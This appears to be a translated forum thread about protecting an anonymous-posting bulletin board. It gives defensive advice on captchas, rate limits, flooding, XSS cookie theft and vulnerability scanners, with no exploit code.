1. You can do it: captcha + local ID=login+pass+random+timestamp with storage in datastorage (it can be created at any time even without user participation).
But moments arise: the phone is without confirmation => the phone will be indicated by someone else just so that someone is constantly spammed with calls => the site will be closed quickly due to complaints.
2. About the rest, in terms of security, this is setting up firewall rules and web server rules.

Without registration, this is shit and not a client. Sorry for the vocabulary. The woodpecker is not a client at all. Spamer is also not a client. And in the end you will weed out 80%

We want to make it possible for them to publish without registration and authorization.

If you are going to make a bulletin board without registration, then you will have to face not only spam, but also flooding.
You need a captcha and detailed customization of user input (For example, limiting an ad to 450 characters).

If a user makes more than 100 posts per minute, we block it. Is this enough or am I missing something?

You miss the possibility that your site can be hacked. For example, through XSS, vulnerabilities will steal the administrator's session cookie. You can check for vulnerabilities with special Legion, OWASP ZAP or Sparta scanners. Of the online options, special resources are suitable, vulnerability scanners that can check most vulnerabilities at each level. https://metascan.ru or https:// detectify.com/ They will show XSS vulnerabilities, the possibility of SQL injection and network stack vulnerabilities.